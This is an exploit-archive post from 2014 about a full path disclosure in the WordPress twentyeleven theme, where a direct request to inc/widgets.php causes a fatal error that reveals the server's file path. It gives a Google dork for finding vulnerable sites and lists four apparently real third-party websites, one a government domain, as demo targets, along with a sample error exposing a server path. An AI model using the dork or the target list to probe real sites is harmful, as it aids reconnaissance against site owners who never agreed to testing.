Wordpress twentyeleven Theme Full Path Disclosure Vulnerability

2014-01-17 20:51:39
Inviato da: JoKeR_StEx

######################################################################################

# Exploit Title : Wordpress twentyeleven Theme Full Path Disclosure Vulnerability
# Author : JoKeR_StEx
# Vendor : http://wordpress.org/
# Date : 17.01.2014
# Tested On : Windows XP Pro Sp3
# Google Dork : inurl:"/wp-content/themes/twentyeleven/"

#####################################################################################

[+] the Vulnerability It's in twentyeleven wordpress theme

[+] Infected File => widgets.php

[+] The error it's About WP_Widget if not found

[+] Error Example : Fatal error: Class 'WP_Widget' not found in /home/storys3/public_html/cityofrats/wp-content/themes/twentyeleven/inc/widgets.php on line 11

# De3mo :
http://www.slamcity.com/cityofrats/wp-content/themes/twentyeleven/inc/widgets.php
http://cltc.gov.ng/wordpress/wp-content/themes/twentyeleven/inc/widgets.php
http://autoapp.nu/dev/wp-content/themes/twentyeleven/inc/widgets.php
http://haleypiersonlaw.com/testing/wp-content/themes/twentyeleven/inc/widgets.php

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.